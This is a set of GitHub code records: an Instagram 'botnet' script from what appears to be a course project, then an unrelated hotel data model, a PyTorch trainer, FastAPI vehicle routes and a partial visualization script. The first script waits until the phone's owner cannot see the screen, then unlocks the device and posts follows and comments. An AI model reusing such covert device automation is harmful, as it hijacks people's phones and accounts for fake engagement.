\"text\", account)\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\n\t# follow the account\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"text\", \"Follow\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\t\n\treturn True\n\ndef comment_on_photo(account, photo_n, comment):\n\tphoto_n = int(photo_n)\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t#assuming 3*3\n\t\tcolumn = photo_n % 3\n\t\trow = photo_n//3 + 1\n\t\t(x, y) = find_coordinates(root, \"content-desc\", \"Photo by A. 
at Row %d, Column %d\" % (row, column))\n\t\tphone.tap(x,y)\n\t\ttime.sleep(1)\t\n\tprint(\"tapped on the photo\")\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"content-desc\", \"Comment\")\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\tphone.input_text(comment)\n\troot = parse_layout()\n\tif (root == None):\n\t\treturn False\n\tif root:\n\t\t(x, y) = find_coordinates(root, \"resource-id\", \"com.instagram.android:id/layout_comment_thread_post_button\")\t\n\t\tif (x==-1 or y==-1):\n\t\t\treturn False\n\t\tphone.tap(x,y)\n\t\ttime.sleep(3)\n\treturn True\n\t\nif (__name__ == '__main__'):\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-f\", \"--follow\", help=\"An account to follow\", required=True) \n\tparser.add_argument(\"-p\", \"--photo_number\", help=\"Photo to be commented\")\n\tparser.add_argument(\"-c\", \"--comment\", help=\"Comment to be posted\") \n\targs = vars(parser.parse_args())\n\tif phone.check_package(\"com.instagram.android\"):\n\t\tif phone.check_if_off():\n\t\t\tprint(\"Starting evil things\")\n\t\t\tphone.unlock()\n\t\t\tphone.open(\"com.instagram.android\")\n\t\t\ttime.sleep(2)\n\t\t\tif (follow_account(args[\"follow\"]) and comment_on_photo(args[\"follow\"], args[\"photo_number\"], args[\"comment\"])):\n\t\t\t\tprint(\"Success\")\n\t\t\telse:\n\t\t\t\tprint(\"try again\")\n\t\t\tphone.close(\"com.instagram.android\")\n\t\t\tphone.lock()\t\n\t\telse:\n\t\t\tprint(\"User can see the phone\")\n\telse:\n\t\tprint(\"Instagram is not installed\")\n","repo_name":"aliyevaa/EC700_Instagram_botnet","sub_path":"followme.py","file_name":"followme.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1046378574","text":"from sql_alchemy import db\nclass HotelModel(db.Model):\n\n __tablename__ = 'hotels' # This is the name of the table in the database\n\n hotel_id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80))\n city = db.Column(db.String(80))\n stars = db.Column(db.Float(precision=1))\n price = db.Column(db.Float(precision=2))\n\n def save_to_db(self): # This method is used to save the data to the database\n pass\n\n\n def __init__(self, hotel_id, name, city, stars, price):\n self.hotel_id = hotel_id\n self.name = name\n self.city = city\n self.stars = stars\n self.price = price\n\n def json(self): # This method is used to return the data in a json format\n return {\n 'hotel_id': self.hotel_id,\n 'name': self.name,\n 'city': self.city,\n 'stars': self.stars,\n 'price': self.price\n }\n \n @classmethod\n def find_hotel(cls, hotel_id):\n return cls.query.filter_by(hotel_id=hotel_id).first() if cls.query.filter_by(hotel_id=hotel_id).first() else None\n # SELECT * FROM hotels WHERE hotel_id = hotel_id\n\n def save_hotel(self):\n db.session.add(self)\n db.session.commit()\n\n def update_hotel(self, name, city, stars, price):\n self.name = name\n self.city = city\n self.stars = stars\n self.price = price\n db.session.commit()\n\n def delete_hotel(self):\n db.session.delete(self)\n db.session.commit()","repo_name":"renanhiramatsu/Travel-Agency","sub_path":"models/hotel.py","file_name":"hotel.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13766621924","text":"\"\"\"\r\nClass for model training.\r\n\"\"\"\r\n\r\nimport copy\r\nimport 
inspect\r\nimport json\r\nimport logging\r\nimport os\r\nimport sys\r\nimport time\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch.utils.data.dataloader import DataLoader\r\n\r\nfrom modeling.evaluation.evaluator import Evaluator\r\nfrom modeling.evaluation.eval_args import EvalArgs\r\nfrom modeling.training.train_epoch import TrainEpoch\r\nfrom modeling.training.train_history import TrainHistory\r\nfrom modeling.training.args.logging_args import LoggingArgs\r\nfrom modeling.training.args.loss_args import LossArguments\r\nfrom modeling.training.args.opt_args import OptimizationArguments\r\nfrom utils import is_jsonable, set_seed\r\n\r\n\r\nclass Trainer:\r\n \"\"\"\r\n Base class for model trainer.\r\n \"\"\"\r\n def __init__(self, train_args, multi_proc_args, model, train_dataset, val_dataset=None):\r\n \"\"\"\r\n :param train_args: dictionary containing arguments related to model to training\r\n - should contain: seed, opt_args, loss_args, logging args, and eval args\r\n :param multi_proc_args: arguments related to multi-processing\r\n :param model: model to train\r\n :param train_dataset: dataset with training data - should work with pytorch dataloader\r\n :param val_dataset (optional): dataset with validation data - should work with pytorch dataloader\r\n \"\"\"\r\n # setup args\r\n self.train_args_dict = train_args\r\n self.opt_args = self._get_opt_args()\r\n self.loss_args = self._get_loss_args()\r\n self.multi_proc_args = multi_proc_args\r\n self.logging_args = self._get_log_args()\r\n self.eval_args = self._get_eval_args()\r\n\r\n # setup logging\r\n self.logger = self._get_logger()\r\n\r\n # get device\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # setup model\r\n self.model = model\r\n model_signature = inspect.signature(self.model.forward)\r\n self.model_input_args = list(model_signature.parameters.keys())\r\n self._setup_model()\r\n\r\n # setup data\r\n self.train_dataset = train_dataset\r\n self.val_dataset = val_dataset\r\n\r\n # set seed\r\n self.seed = self.train_args_dict[\"seed\"]\r\n set_seed(self.seed)\r\n\r\n # init train hist\r\n self.train_hist = self._init_train_history()\r\n\r\n def train(self):\r\n \"\"\"\r\n Train model.\r\n \"\"\"\r\n self.logger.info(\"Starting TRAIN\")\r\n train_start_time = time.time()\r\n\r\n # training setup - stopping checker & train epoch module\r\n stop_checker = self.opt_args.create_stop_checker()\r\n opt = self.opt_args.create_optimizer(self.model)\r\n train_dataloader = self._get_train_dataloader()\r\n train_epoch = TrainEpoch(\r\n self.model,\r\n self.model_input_args,\r\n self.multi_proc_args,\r\n self.loss_args,\r\n self.logger,\r\n train_dataloader,\r\n opt,\r\n stop_checker,\r\n self.train_hist\r\n )\r\n\r\n # run training\r\n self._run_train(train_epoch, stop_checker)\r\n self._log_train_completion(train_start_time)\r\n\r\n if self.opt_args.load_best_model_at_end:\r\n print(\"loading best model\")\r\n self.model.load_state_dict(torch.load(os.path.join(self.logging_args.output_dir, \"best_model.pt\")))\r\n\r\n def _run_train(self, train_epoch, stop_checker):\r\n while True:\r\n train_epoch.run_train_epoch()\r\n # check if need to evaluate model, save model, and/or stop training\r\n stop_training = self._maybe_eval_save_stop(stop_checker)\r\n if stop_training:\r\n return\r\n\r\n def _log_train_completion(self, train_start_time):\r\n # log training completion and save train results\r\n self.logger.info(f\"Stopping TRAIN after {self.train_hist.epoch} epochs, 
{self.train_hist.step} total steps\")\r\n train_time = time.time() - train_start_time\r\n self.train_hist.add_train_time_info(train_time)\r\n self.logger.info(\"TRAIN finished in {:.2f} seconds\".format(train_time))\r\n if self.logging_args.save_last_model:\r\n self.model.save(self.logging_args.output_dir, \"final_model\")\r\n self._save_train_hist(\"train_history.json\")\r\n\r\n def evaluate(self, eval_dataset=None, eval_name=\"val\", save_results=True):\r\n \"\"\"\r\n Evaluate model. Can be called multiple times (e.g., with different datasets).\r\n :param eval_dataset: dataset to evaluate model with\r\n :param eval_name: name of evaluation, used in naming output result files\r\n :param save_results: if True, save eval results\r\n \"\"\"\r\n # set dataset to default if not passed as argument\r\n if eval_dataset is None:\r\n eval_dataset = self.val_dataset\r\n evaluator = self._get_evaluator(eval_dataset)\r\n eval_results = evaluator.evaluate()\r\n if save_results:\r\n # save eval metrics\r\n self._save_eval_results(eval_results.metrics, f\"{eval_name}_evaluation_metrics.json\")\r\n if self.eval_args.save_preds:\r\n eval_results.save_preds(self.logging_args.output_dir)\r\n return eval_results\r\n\r\n def _get_evaluator(self, eval_dataset):\r\n evaluator = Evaluator(\r\n self.model,\r\n self.model_input_args,\r\n self.multi_proc_args,\r\n self.loss_args,\r\n self.logger,\r\n eval_dataset,\r\n self.eval_args\r\n )\r\n return evaluator\r\n\r\n def _maybe_eval_save_stop(self, stop_checker):\r\n stop_training = False\r\n do_eval = (self.val_dataset is not None and self.train_hist.epoch % self.eval_args.eval_epochs == 0)\r\n if do_eval:\r\n # evaluate model\r\n self.logger.info(f\"Evaluating model after {self.train_hist.epoch} epochs\")\r\n eval_metrics = dict()\r\n if \"val\" in self.eval_args.splits:\r\n val_eval_metrics = self.evaluate().metrics\r\n for k, v in val_eval_metrics.items():\r\n eval_metrics[f\"val_{k}\"] = v\r\n if \"train\" in self.eval_args.splits:\r\n train_eval_metrics = self.evaluate(self.train_dataset, eval_name=\"train\").metrics\r\n for k, v in train_eval_metrics.items():\r\n eval_metrics[f\"train_{k}\"] = v\r\n self.train_hist.add_eval_result(eval_metrics, self.train_hist.epoch)\r\n if do_eval or \\\r\n (self.opt_args.best_metric_data == \"train\" and self.opt_args.best_metric == \"loss\"):\r\n if stop_checker.apply_early_stopping:\r\n # check if should stop early (need to check before updating best so far)\r\n stop_training = stop_checker.check_early_stop(self.train_hist)\r\n if stop_training:\r\n self.logger.info(f\"Stopping TRAIN early after {self.train_hist.epoch} epochs, \"\r\n f\"{self.train_hist.step} total steps\")\r\n # check if latest epoch is best so far & update best so far based on this\r\n best_so_far = self.train_hist.check_update_best_so_far()\r\n if best_so_far:\r\n self.logger.info(f\"{self.opt_args.best_metric_data}-{self.opt_args.best_metric} is best so far\")\r\n # check if should save model\r\n if self.logging_args.save_best_model:\r\n self.model.save(self.logging_args.output_dir, \"best_model\")\r\n if not stop_training:\r\n # check if should stop based on timing criteria\r\n stop_training = stop_checker.check_stop(self.train_hist.epoch,\r\n self.train_hist.step,\r\n self.train_hist.sample_count)\r\n return stop_training\r\n\r\n def _save_train_hist(self, file_name):\r\n train_hist_dict = copy.deepcopy(self.train_hist.__dict__)\r\n file_path = os.path.join(self.logging_args.output_dir, file_name)\r\n for k, v in train_hist_dict.items():\r\n # check 
if json serializable\r\n if not is_jsonable(v):\r\n train_hist_dict[k] = str(v)\r\n with open(file_path, 'w') as outfile:\r\n json.dump(train_hist_dict, outfile)\r\n\r\n def _save_eval_results(self, eval_metrics, file_name):\r\n file_path = os.path.join(self.logging_args.output_dir, file_name)\r\n with open(file_path, 'w') as outfile:\r\n json.dump(eval_metrics, outfile)\r\n\r\n def _get_logger(self):\r\n if self.logging_args.verbose:\r\n logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.INFO, stream=sys.stdout,\r\n datefmt='%Y-%m-%d %H:%M:%S')\r\n else:\r\n output_file = os.path.join(self.logging_args.output_dir, \"training.log\")\r\n logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', filename=output_file, filemode=\"w+\",\r\n level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')\r\n return logging.getLogger()\r\n\r\n def _get_opt_args(self):\r\n return OptimizationArguments(**self.train_args_dict[\"opt_args\"])\r\n\r\n def _get_loss_args(self):\r\n return LossArguments(**self.train_args_dict[\"loss_args\"])\r\n\r\n def _get_log_args(self):\r\n return LoggingArgs(**self.train_args_dict[\"log_args\"])\r\n\r\n def _get_eval_args(self):\r\n args = {}\r\n if \"eval_args\" in self.train_args_dict:\r\n args = self.train_args_dict[\"eval_args\"]\r\n return EvalArgs(**args)\r\n\r\n def _setup_model(self):\r\n # setup model --> note: we use loss function *within* model to make data parallel easier\r\n self.model.set_loss_fn(self.loss_args.get_loss_fn())\r\n if self.multi_proc_args.apply_data_parallel:\r\n self.model = nn.DataParallel(self.model)\r\n self.model = self.model.to(self.device)\r\n\r\n def _init_train_history(self):\r\n return TrainHistory(self.opt_args.best_metric, self.opt_args.best_metric_data, self.opt_args.greater_is_better)\r\n\r\n def _get_train_dataloader(self):\r\n return DataLoader(\r\n self.train_dataset,\r\n batch_size=self.opt_args.batch_size,\r\n shuffle=True,\r\n num_workers=self.multi_proc_args.num_workers,\r\n pin_memory=True,\r\n drop_last=True\r\n )\r\n","repo_name":"kmatton/contrastive-learning-for-eda","sub_path":"modeling/training/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9957864438","text":"from typing import List, Optional\nfrom fastapi import APIRouter, Depends\nfrom auth import auth\nfrom models.matatu import Matatu, Date\nfrom models.user import User\nfrom crud import matatu\n\nrouter = APIRouter(\n prefix=\"/matatus\",\n tags=[\"matatus\"],\n)\n\n#Read all matatus \n@router.get(\"/\" )\nasync def read_matatus (current_user : User = Depends(auth.get_current_user)):\n return matatu.find_all_matatus()\n\n#read matatu waiting List\n@router.get(\"/waiting\")\nasync def read_waiting_matatus():\n return matatu.find_waiting_matatus()\n\n#read matatu done List\n@router.get(\"/done\")\nasync def read_done_matatus():\n return matatu.find_done_matatus()\n\n#read matatu done List\n@router.get(\"/search\")\nasync def search_matatus(query: Optional[str] = None, current_user : User = Depends(auth.get_current_user)):\n return matatu.search_matatu(query)\n\n\n#read one matatu \n@router.get(\"/{reg}\")\nasync def read_one_matatu(reg: str, current_user : User = Depends(auth.get_current_user)):\n return matatu.find_one_matatu(reg)\n \n\n#add matatu to waiting List\n@router.post(\"/waiting\")\nasync def add_matatu(data: List[Matatu], current_user : User = 
Depends(auth.get_current_user)):\n return matatu.add_matatu_waiting(data)\n\n#add one matatu to db\n@router.post(\"/\")\nasync def add_matatu(data: Matatu, current_user : User = Depends(auth.get_current_user)):\n return matatu.create_matatu(data)\n\n#Edit status details\n@router.put(\"/waiting/{reg}\")\nasync def update_status_details(reg: str, date: Date, current_user : User = Depends(auth.get_current_user)):\n return matatu.update_waiting_status(reg, date)\n\n#Edit matatu details\n@router.put(\"/{reg}\")\nasync def edit_matatu_details(reg: str, data: Matatu, current_user : User = Depends(auth.get_current_user)):\n return matatu.update_matatu(reg, data)\n\n#delete matatu \n@router.delete(\"/waiting/{reg}\")\nasync def delete_matatu_waiting(reg: str, current_user : User = Depends(auth.get_current_user)):\n return matatu.delete_matatu_waiting(reg)\n\n#delete matatu \n@router.delete(\"/{reg}\")\nasync def delete_matatu(reg: str, current_user : User = Depends(auth.get_current_user)):\n return matatu.delete_matatu(reg)","repo_name":"maxwellwachira/vehicle-shifter-backend","sub_path":"routes/matatu.py","file_name":"matatu.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30297901323","text":"#!/usr/bin/env python\n\"\"\"\nVisualize debug information.\n\nExample\n ./vis_tran.py bird v1 alexS1S2 --nstn 1 --epo 1:2\n\nHistory\n create - Feng Zhou (zhfe99@gmail.com), 2015-08\n modify - Feng Zhou (zhfe99@gmail.com), 2015-12\n\"\"\"\nimport argparse\nimport os\nimport numpy as np\nimport py_lib as lib\nlib.prSet(3)\n\n\ndef shEpoTrImg(dbe, ver, con, nStn, epo, iBat=1):\n \"\"\"\n Show the transformation of each epoch.\n\n Input\n dbe - database\n ver - version\n con - configuration\n nStn - #stn\n epo - epoch id\n iBat - batch id\n \"\"\"\n # fold\n nm = '{}_{}_{}'.format(dbe, ver, con)\n tmpFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/tmp/{}'.format(dbe, nm))\n outFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n lib.mkDir(outFold)\n\n # path\n outPath = '{}/tr_{}_{}_img.jpg'.format(outFold, epo, iBat)\n\n # read from hdf\n h5Path = '{}/tr_{}_{}_grid.h5'.format(tmpFold, epo, iBat)\n ha = lib.hdfRIn(h5Path)\n gridCorns = lib.cells(nStn)\n for iStn in range(nStn):\n gridCorns[iStn] = lib.hdfR(ha, 'gridCorn{}'.format(iStn + 1))\n lib.hdfROut(ha)\n\n # read from hdf\n h5Path = '{}/tr_{}_{}_img_in.h5'.format(tmpFold, epo, iBat)\n ha = lib.hdfRIn(h5Path)\n imgIn0 = lib.hdfR(ha, 'imgIn0')\n imgIns = lib.cells(nStn)\n for iStn in range(nStn):\n imgIns[iStn] = lib.hdfR(ha, 'imgIn{}'.format(iStn + 1))\n lib.hdfROut(ha)\n\n # dimension\n n, _, h, w = imgIn0.shape\n nTop = min(n, 7)\n\n # show\n rows = 2\n cols = nTop\n Ax = lib.iniAx(1, nStn * rows, cols, [3 * nStn * rows, 3 * cols], flat=False)\n\n # each transformer\n for iStn in range(nStn):\n grid = gridCorns[iStn]\n\n # each example\n for iTop in range(nTop):\n col = iTop\n\n # original input\n lib.shImg(imgIn0[iTop].transpose((1, 2, 0)), ax=Ax[iStn * 2, col])\n\n idxYs = [0, 0, 1, 1, 0]\n idxXs = [0, 1, 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (grid[iTop, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (grid[iTop, idxY, idxX, 1] + 1) / 2 * w\n lib.plt.plot(xs, ys, 'r-')\n # lib.plt.axis('image')\n\n # input\n lib.shImg(imgIns[iStn][iTop].transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, col])\n\n # mean\n # inMe0 = input0.mean(0)\n # inMe = 
input.mean(0)\n    # lib.shImg(inMe0.transpose((1, 2, 0)), ax=Ax[iStn * 2, nTop])\n    # lib.shImg(inMe.transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, nTop])\n\n    # save\n    # lib.show()\n    lib.shSvPath(outPath, type='jpg')\n\n\ndef shEpoTrGrid(dbe, ver, con, nStn, epo, iBat=1):\n    \"\"\"\n    Show the transformation of each epoch.\n\n    Input\n      dbe  - database\n      ver  - version\n      con  - configuration\n      nStn - #stn\n      epo  - epoch id\n      iBat - batch id\n    \"\"\"\n    # fold\n    nm = '{}_{}_{}'.format(dbe, ver, con)\n    tmpFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/tmp/{}'.format(dbe, nm))\n    outFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n    lib.mkDir(outFold)\n\n    # path\n    h5Path = '{}/tr_{}_{}_grid.h5'.format(tmpFold, epo, iBat)\n    outPath = '{}/tr_{}_{}_grid.jpg'.format(outFold, epo, iBat)\n\n    # read from hdf\n    ha = lib.hdfRIn(h5Path)\n    gridCorns, gridGrads, imgOuts = lib.cells(nStn, n=3)\n    for iStn in range(nStn):\n        gridCorns[iStn] = lib.hdfR(ha, 'gridCorn{}'.format(iStn + 1))\n        gridGrads[iStn] = lib.hdfR(ha, 'gridGrad{}'.format(iStn + 1))\n        imgOuts[iStn] = lib.hdfR(ha, 'imgOut{}'.format(iStn + 1))\n    lib.hdfROut(ha)\n\n    # dimension\n    n, _, _, _ = gridCorns[0].shape\n    _, h, w, _ = gridGrads[0].shape\n\n    # show\n    rows = 1\n    cols = 3\n    Ax = lib.iniAx(1, nStn * rows, cols, [3 * nStn * rows, 3 * cols], flat=False)\n\n    # each transformer\n    for iStn in range(nStn):\n        # show grid\n        lib.setAx(Ax[iStn, 0])\n        co = 0\n        for iExp in range(n):\n            idxYs = [0, 0, 1, 1, 0]\n            idxXs = [0, 1, 1, 0, 0]\n            xs, ys = lib.zeros(5, n=2)\n            for i in range(5):\n                idxY = idxYs[i]\n                idxX = idxXs[i]\n\n                ys[i] = (gridCorns[iStn][iExp, idxY, idxX, 0] + 1) / 2 * h\n                xs[i] = (gridCorns[iStn][iExp, idxY, idxX, 1] + 1) / 2 * w\n            if np.any(xs < 0) or np.any(xs > w) or np.any(ys < 0) or np.any(ys > h):\n                co += 1\n            lib.plt.plot(xs, ys, 'r-')\n        lib.plt.axis('equal')\n        lib.plt.axis([0, h, 0, w])\n        lib.plt.gca().invert_yaxis()\n        lib.plt.title('{}/{}'.format(co, n))\n\n        # show gradient\n        lib.setAx(Ax[iStn, 1])\n        GX = gridGrads[iStn][0][:, :, 0]\n        GY = gridGrads[iStn][0][:, :, 1]\n        Q = lib.plt.quiver(GX, GY)\n        lib.plt.quiverkey(Q, 0.5, 0.92, 2, '', labelpos='W')\n        lib.plt.axis([0, h, 0, w])\n        lib.plt.gca().invert_yaxis()\n\n        gX = gridGrads[iStn][0][:, :, 0].mean()\n        gY = gridGrads[iStn][0][:, :, 1].mean()\n        lib.plt.title('{:.2f} {:.3e}'.format(np.arctan2(gY, gX) * 180 / np.pi, np.linalg.norm([gX, gY])))\n\n        # show average image\n        lib.shImg(imgOuts[iStn][0].transpose((1, 2, 0)), ax=Ax[iStn, 2])\n\n    # save\n    # lib.show()\n    lib.shSvPath(outPath, type='jpg')\n\n\ndef shEpoTran(dbe, ver, con, nStn, epo, iBat=1):\n    \"\"\"\n    Show the transformation of each epoch.\n\n    Input\n      dbe  - database\n      ver  - version\n      con  - configuration\n      nStn - #stn\n      epo  - epoch id\n      iBat - batch id\n    \"\"\"\n    # fold\n    nm = '{}_{}_{}'.format(dbe, ver, con)\n    tmpFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/tmp/{}'.format(dbe, nm))\n    outFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n    lib.mkDir(outFold)\n\n    # path\n    h5Path = '{}/test_{}_{}.h5'.format(tmpFold, epo, iBat)\n    outPath = '{}/test_{}_{}.jpg'.format(outFold, epo, iBat)\n\n    # read from hdf\n    ha = lib.hdfRIn(h5Path)\n    inputs, grids = [], []\n    for iStn in range(nStn):\n        gridi = lib.hdfR(ha, 'grid{}'.format(iStn + 1))\n        inputi = lib.hdfR(ha, 'input{}'.format(iStn + 1))\n        grids.append(gridi)\n        inputs.append(inputi)\n    input0 = lib.hdfR(ha, 'input0')\n    # bias = lib.hdfR(ha, 'bias')\n    # weight = lib.hdfR(ha, 'weight')\n    lib.hdfROut(ha)\n\n    # dimension\n    n, h, w, _ = grids[0].shape\n    nTop = min(input0.shape[0], 7)\n\n    # show\n    cols = nTop + 1\n    Ax = lib.iniAx(1, nStn * 2, cols, [3 * nStn * 2, 3 * cols], flat=False)\n\n    lib.setAx(Ax[0, nTop])\n    lib.plt.axis('off')\n\n    # each transformer\n    for iStn in range(nStn):\n        input = inputs[iStn]\n        grid = grids[iStn]\n\n        # each example\n        for iTop in range(nTop):\n            col = iTop\n\n            # original input\n            input0New = input0[iTop].transpose((1, 2, 0))\n            lib.shImg(input0New, ax=Ax[iStn * 2, col])\n\n            idxYs = [0, 0, h - 1, h - 1, 0]\n            idxXs = [0, w - 1, w - 1, 0, 0]\n            xs, ys = lib.zeros(5, n=2)\n            for i in range(5):\n                idxY = idxYs[i]\n                idxX = idxXs[i]\n\n                ys[i] = (grid[iTop, idxY, idxX, 0] + 1) / 2 * h\n                xs[i] = (grid[iTop, idxY, idxX, 1] + 1) / 2 * w\n            lib.plt.plot(xs, ys, 'r-')\n            lib.plt.axis('image')\n\n            # input\n            inputNew = input[iTop].transpose((1, 2, 0))\n            lib.shImg(inputNew, ax=Ax[iStn * 2 + 1, col])\n\n        # mean\n        inMe0 = input0.mean(0)\n        inMe = input.mean(0)\n        lib.shImg(inMe0.transpose((1, 2, 0)), ax=Ax[iStn * 2, nTop])\n        lib.shImg(inMe.transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, nTop])\n\n    # save\n    # lib.show()\n    lib.shSvPath(outPath)\n\n\ndef shEpoTranCmp(dbe, ver, con, nStn, epo, iBat=1, rows=2, cols=5):\n    \"\"\"\n    Show the transformation of each epoch in a more compressed way.\n\n    Input\n      dbe  - database\n      ver  - version\n      con  - configuration\n      nStn - #stn\n      epo  - epoch id\n      iBat - batch id\n      rows - #row, {2}\n      cols - #col, {5}\n    \"\"\"\n    # fold\n    nm = '{}_{}_{}'.format(dbe, ver, con)\n    tmpFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/tmp/{}'.format(dbe, nm))\n    pdfFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n    lib.mkDir(pdfFold)\n\n    # path\n    h5Path = '{}/test_{}_{}.h5'.format(tmpFold, epo, iBat)\n\n    # read from hdf\n    ha = lib.hdfRIn(h5Path)\n    inputs, grids = [], []\n    for iStn in range(nStn):\n        gridi = lib.hdfR(ha, 'grid{}'.format(iStn + 1))\n        inputi = lib.hdfR(ha, 'input{}'.format(iStn + 1))\n        grids.append(gridi)\n        inputs.append(inputi)\n    input0 = lib.hdfR(ha, 'input0')\n    lib.hdfROut(ha)\n\n    # dimension\n    n, h, w, _ = grids[0].shape\n    nGrp = n / (rows * cols)\n\n    # each group\n    for iGrp in range(nGrp):\n        # group path\n        pdfPath = '{}/test_{}_{}_{}.pdf'.format(pdfFold, epo, iBat, iGrp)\n\n        # show\n        Ax = lib.iniAx(1, rows, cols, [3 * rows, 3 * cols], flat=False)\n\n        # each example\n        for iExp in range(rows * cols):\n            # position\n            pExp = iGrp * rows * cols + iExp\n            row = iExp / cols\n            col = iExp % cols\n\n            # original input\n            input0New = input0[pExp].transpose((1, 2, 0))\n            lib.shImg(input0New, ax=Ax[row, col])\n\n            # each transformer\n            for iStn in range(nStn):\n                grid = grids[iStn]\n\n                idxYs = [0, 0, h - 1, h - 1, 0]\n                idxXs = [0, w - 1, w - 1, 0, 0]\n                xs, ys = lib.zeros(5, n=2)\n                for i in range(5):\n                    idxY = idxYs[i]\n                    idxX = idxXs[i]\n\n                    ys[i] = (grid[pExp, idxY, idxX, 0] + 1) / 2 * h\n                    xs[i] = (grid[pExp, idxY, idxX, 1] + 1) / 2 * w\n\n                _, cl = lib.genMkCl(iStn)\n                lib.plt.plot(xs, ys, '-', color=cl)\n            lib.plt.axis('image')\n        # save\n        # lib.show()\n        lib.shSvPath(pdfPath)\n\n\ndef shEpoGrad(dbe, ver, con, nStn, epo):\n    \"\"\"\n    Show the gradient of each epoch.\n\n    Input\n      dbe  - database\n      ver  - version\n      con  - configuration\n      nStn - #stn\n      epo  - epoch id\n    \"\"\"\n    tmpFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/tmp/{}_{}_{}'.format(dbe, dbe, ver, con))\n    pdfFold = os.path.join(os.environ['HOME'],\n                           'save/{}/torch/deb_stn/{}_{}_{}'.format(dbe, dbe, ver, con))\n    lib.mkDir(pdfFold)\n\n    # path\n    h5Path = 
'{}/train_{}_{}_grad.h5'.format(tmpFold, epo, 1)\n pdfPath = '{}/train_{}_{}_grad.pdf'.format(pdfFold, epo, 1)\n\n # read from hdf\n ha = lib.hdfRIn(h5Path)\n imgOuts, imgGrads, gridOuts, gridGrads = [], [], [], []\n for iStn in range(nStn):\n imgOuts.append(lib.hdfR(ha, 'imgOut{}'.format(iStn + 1)))\n imgGrads.append(lib.hdfR(ha, 'imgGrad{}'.format(iStn + 1)))\n gridOuts.append(lib.hdfR(ha, 'gridOut{}'.format(iStn + 1)))\n gridGrads.append(lib.hdfR(ha, 'gridGrad{}'.format(iStn + 1)))\n imgOut0 = lib.hdfR(ha, 'imgOut0')\n # bias = lib.hdfR(ha, 'bias')\n # weight = lib.hdfR(ha, 'weight')\n lib.hdfROut(ha)\n\n # dimension\n n, d, h, w = imgOut0.shape\n nTop = min(n, 7)\n\n # show\n cols = nTop\n rowStn = 4\n Ax = lib.iniAx(1, nStn * rowStn, cols, [3 * nStn * rowStn, 3 * cols], flat=False)\n\n # each transformer\n for iStn in range(nStn):\n imgOut = imgOuts[iStn]\n imgGrad = imgGrads[iStn]\n gridOut = gridOuts[iStn]\n gridGrad = gridGrads[iStn]\n\n # each example\n for iTop in range(nTop):\n col = iTop\n\n # original input\n lib.shImg(imgOut0[iTop].transpose((1, 2, 0)), ax=Ax[iStn * rowStn, col])\n\n idxYs = [0, 0, h - 1, h - 1, 0]\n idxXs = [0, w - 1, w - 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (gridOut[iTop, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (gridOut[iTop, idxY, idxX, 1] + 1) / 2 * w\n lib.plt.plot(xs, ys, 'r-')\n # lib.plt.axis('image')\n\n # crop input\n lib.shImg(imgOut[iTop].transpose((1, 2, 0)), ax=Ax[iStn * rowStn + 1, col])\n\n # image gradient\n imgGradMa = imgGrad[iTop].max()\n imgGradMi = imgGrad[iTop].min()\n lib.shImg((imgGrad[iTop] - imgGradMi) / (imgGradMa - imgGradMi), ax=Ax[iStn * rowStn + 2, col])\n\n # grid gradient\n lib.setAx(Ax[iStn * rowStn + 3, col])\n GX = gridGrad[iTop][:, :, 0]\n GY = gridGrad[iTop][:, :, 1]\n Q = lib.plt.quiver(GX, GY)\n qk = lib.plt.quiverkey(Q, 0.5, 0.92, 2, '', labelpos='W')\n # lib.plt.axis('image')\n lib.plt.gca().invert_yaxis()\n\n # mean\n # inMe0 = input0.mean(0)\n # inMe = input.mean(0)\n # lib.shImg(inMe0.transpose((1, 2, 0)), ax=Ax[iStn * 2, nTop])\n # lib.shImg(inMe.transpose((1, 2, 